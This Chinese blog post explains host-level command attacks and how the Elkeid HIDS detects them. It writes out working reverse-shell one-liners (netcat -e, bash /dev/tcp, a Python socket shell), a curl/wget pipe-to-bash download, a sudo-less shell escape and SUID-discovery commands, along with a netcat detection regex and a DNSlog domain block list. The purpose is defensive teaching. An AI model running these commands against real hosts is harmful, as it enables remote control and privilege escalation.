主机安全-进程、命令攻击与检测

于 2024-07-13 20:06:05 发布
阅读量891 收藏 7
点赞数 4
分类专栏: 网络安全 # 主机安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lady_killer9/article/details/140401429
版权

目录

概述

本文更新通过在主机(不含容器)上直接执行命令或启动进程来攻击的场景。检测方面以字节跳动的开源HIDS elkeid举例。每种检测仅举一个例子,其余的给出示例payload。

反弹shell

原理

控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端

nc

nc 远程ip 端口 -e /bin/bash

Elkeid规则如下:

(?:\bnc(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.openbsd(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.traditional(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.linux(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnetcat(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*))

在这里插入图片描述

/dev/xxx反弹shell

指的是通过/dev/tcp或/dev/udp的方式建立连接反弹shell,举例:

bash -i >& /dev/tcp/远程ip/端口 0>&1

下载不落地反弹Shell

指的是下载后通过管道等方式执行,不落地,举例:

curl/wget http://xxx.sh | bash

各种语言反弹shell

以Python为例:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("远程ip",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

linux提权

sudo

原理:临时赋予root权限运行某个程序

sudo less file_path

!bash

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

suid提权

chmod u+s filename 设置SUID位
chmod u-s filename 去掉SUID设置

收集具有suid的文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

在这里插入图片描述

mysql提权

  • udf提权
  • 写入webshell提权
  • mof提权

Dnslog

Elkeid规则如下:

.awvsscan119.autoverify.cn|.cybertunnel.run|.dnstunnel.run|.s0x.cn|.dns.1433.eu.org|.logplog.eu.org|.ns.dns3.cf|.vuleye.pw|.ceye.io|.exeye.io|.vcap.me|.xip.name|.xip.io|.sslip.io|.nip.io|.burpcollaborator.net|.tu4.org|.2xss.cc|.bxss.me|.godns.vip|.0kee.360.cn|.r87.me|.ngrok.io|.xn--9tr.com|.pipedream.net|.vxtrans.com|.vxtrans.link|.hopto.org|.zapto.org|.sytes.net|.ddns.net

在这里插入图片描述
在这里插入图片描述

参考

linux提权
反弹Shell原理及检测技术研究

lady_killer9
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
OSSEC-hids 主机入侵检测系统概述
fured的博客
01-19 3326
随着国家对网络安全的重视,国内各个企业也开始在安全方面增加投入,我们公司也不例外。作为防守方,实时了解主机状态(主机文件是否被修改?是否有被入侵?等等)以及实时获取告警信息,是很重要的。及时反制入侵行为、及时修复系统,将入侵扼杀在摇篮阶段。于是引入了HIDS(主机入侵检测系统),网上关于HIDS的文章比较少、内容也不尽完善,下面是我自己在搭建HIDS时的记录。 常用的主机入侵检测系统 AIDE(Advanced Intrusion Detection Environment):高级入侵检测环境,CIS
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 018-网络安全应急技术与实践(主机层-Liunx)
热门推荐
时光隧道
02-12 6万+
Linux主机安全是指在Linux操作系统的主机层实施的一系列安全措施和策略,用于保护Linux主机免受各种安全威胁和攻击的影响。措施描述使用最新的操作系统和软件版本及时更新操作系统和软件补丁,以修复已知的安全漏洞配置强密码策略设置复杂的密码要求,如密码的长度、复杂度要求等,避免使用弱密码禁用不必要的服务关闭或禁用不需要的网络服务,减少攻击面防火墙配置配置防火墙规则,只允许必要的网络流量进入主机定期备份数据定期备份重要的数据,并将备份数据存储在安全的位置限制用户权限。
APT攻击检测与防御详解
Antrn
01-20 4万+
APT定义 APT(Advanced Persistent Threat)是指高级持续性威胁,本质是针对性攻击。 利用先进的攻击手段对特定目标进行长期持续性网络攻击攻击形式,APT攻击的原理相对于其他攻击形式更为高级和先进,其高级性主要体现在APT在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。在此收集的过程中,此攻击会主动挖掘被攻击对象受信系统和应用程序的漏洞,利用这些漏洞组建.........
[论文阅读] (10)基于溯源图的APT攻击检测安全顶会总结
杨秀璋的专栏
10-11 2万+
《娜璋带你读论文》系列主要是督促自己阅读优秀论文及听取学术讲座,并分享给大家,希望您喜欢。前一篇文章分享了S&P2019《HOLMES: Real-time APT Detection through Correlation of Suspicious Information Flows》,基于可疑信息流的实时APT检测。这篇文章将详细介绍和总结基于溯源图的APT攻击检测安全顶会内容,花了作者一个多月时间。希望这篇文章对您有所帮助,这些大佬是真的值得我们去学习,献上小弟的膝盖~fighting!
Notes Twelfth Day-渗透攻击-红队-命令与控制
qq_34801745的博客
09-28 7714
** Notes Twelfth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-28 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好
信息安全:网络攻击原理与常用方法.
网络安全领域___专研者.
04-04 8684
网络攻击:是损害网络系统安全属性的危害行为。危害行为导致网络系统的机密性、完整性、可控性、真实性、抗抵赖性等受到不同程度的破坏。
PowerShell攻击检测
Ping_Pig的博客
11-02 4252
讲在前面 这篇文章相对目前的大环境来说,已经不合时宜了,但我们还是要拿出来讲一讲,思考思考Powershell的攻击检测问题。以期望给目前国内的中小企业的网络安全建设提供一些建议。 Powershell作为工具的演变 Powershell是Microsoft Windows所有受支持版本(Win7/Windows 2008 R2和更高版本)上内置的命令行工具。微软称其为是最安全,最透明的Shell、脚本语言或编程语言。但恰恰因为其强大,也吸引了攻击者的注意力。因为其可以在内存中执行代码的特点,攻击
Linux主机检测(巡检)常用命令总结
weixin_43996007的博客
01-27 2904
Linux主机检测(巡检)常用命令总结## 1、查看系统主机名称信息
网络安全-技术与实践 书本习题练习
Syou的博客
04-05 4万+
网络安全基础 第一章 引言 填空题 1.信息安全的三个基本目标是(),此外,还有一个不可忽视的目标是() ​ 保密性、完整性、可用性;合法使用。 2.网络中存在的四种基本安全威胁有() ​ 信息泄露、完整性破坏、拒绝服务、非法使用。 3.访问控制策略可以划分为()和() ​ 强制性访问控制策略(MAC)和自主性访问控制策略(DAC)。 4.安全攻击可以划分为()和() ​ 被动攻击和主动攻击。 5.X800定义的五类安全服务是 ​ 认证、访问控制、数据保密性、数据完整性、不可否认性。 6.X800定义的8
电子书籍-Linux命令大全搜索工具
最新发布
03-26
- **应用场景**:检测潜在的ARP欺骗攻击。 20. **as (汇编语言编译器)** - **用途**:将汇编语言源代码编译为机器码。 - **应用场景**:编写低级系统软件。 21. **at (在指定时间执行一个任务)** - **用途**:...
主机安全测评linux.pdf
09-30
主机安全测评Linux】主要涉及的是对Linux操作系统进行安全性的评估和增强,以确保系统的稳定性和数据的安全。以下是对各个知识点的详细说明: 1. **身份鉴别** - **身份标识和鉴别**:通过`cat /etc/passwd`和`...
信息安全技术基础:Windows下netstat命令的使用.doc
11-01
同时,对于网络安全专业人员来说,netstat也是检测和预防网络攻击的重要手段,例如它可以用来发现潜在的端口扫描行为或非法连接。 总的来说,了解和熟练使用netstat命令对于提升网络管理效率,保障网络安全具有重要...
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
一旦连接建立,攻击者可以使用`dir`命令查看远程主机的共享资源,如`dir \\192.168.160.135\C$`,甚至使用`tasklist`命令检查目标机器上运行的进程,如`tasklist /S 192.168.160.135 /U HACKBIJI\Administrator /P ...
Linux系统面向进程安全审计机制的设计与实现.pdf
09-07
《Linux系统面向进程安全审计机制的设计与实现》这篇文章主要探讨了如何在Linux系统中构建一个面向进程安全审计机制,以增强系统的安全性。该机制的主要目标是监控特权进程,通过跟踪其系统调用来实现内核层的安全...
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-20
手动收集可以通过执行如`ipconfig /all`来获取网络配置信息,`systeminfo`结合`findstr`命令来查询操作系统和软件版本,以及`wmic`命令来查询服务、进程、启动程序、计划任务等信息。 2. **油猴子脚本**(Tamper...
网络安全实验.zip
06-03
通过不断地练习和实验,我们可以更有效地监控网络环境,保护系统免受攻击,确保数据安全。同时,这也为网络安全专业人士提供了宝贵的工具和方法,使他们能够更好地应对日常工作中遇到的各种挑战。
Python-RedSails一个基于Python的postexploitation项目
08-10
RedSails是一款基于Python的后渗透利用工具,专为安全研究人员和渗透测试人员设计,旨在帮助他们在攻击过程中避开基于主机安全防护措施和日志跟踪。这一工具集成了多种技术,使攻击者能够在不被发现的情况下进行...
常用shell 脚本,dos攻击防范,
05-26
批量主机远程执行命令脚本.sh 批量创建100用户并设置密码脚本.sh 批量检测网站是否异常脚本.sh 找出占用CPU 内存过高的进程脚本.sh 更多精品教程.url 服务器系统配置初始化脚本.sh 本教程由我爱学it提供.url ...
2021-2022年收藏的精品资料使用安全审计加强Linux主机安全维护能力.doc
09-17
主机安全审计是维护系统安全的关键环节,它通过对系统活动的记录和分析,帮助管理员监控和检测潜在的安全威胁,及时发现异常行为,防止未授权访问、恶意攻击以及内部滥用资源等风险。审计能够提供系统活动的透明度...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lady_killer9

感谢您的打赏,我会加倍努力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值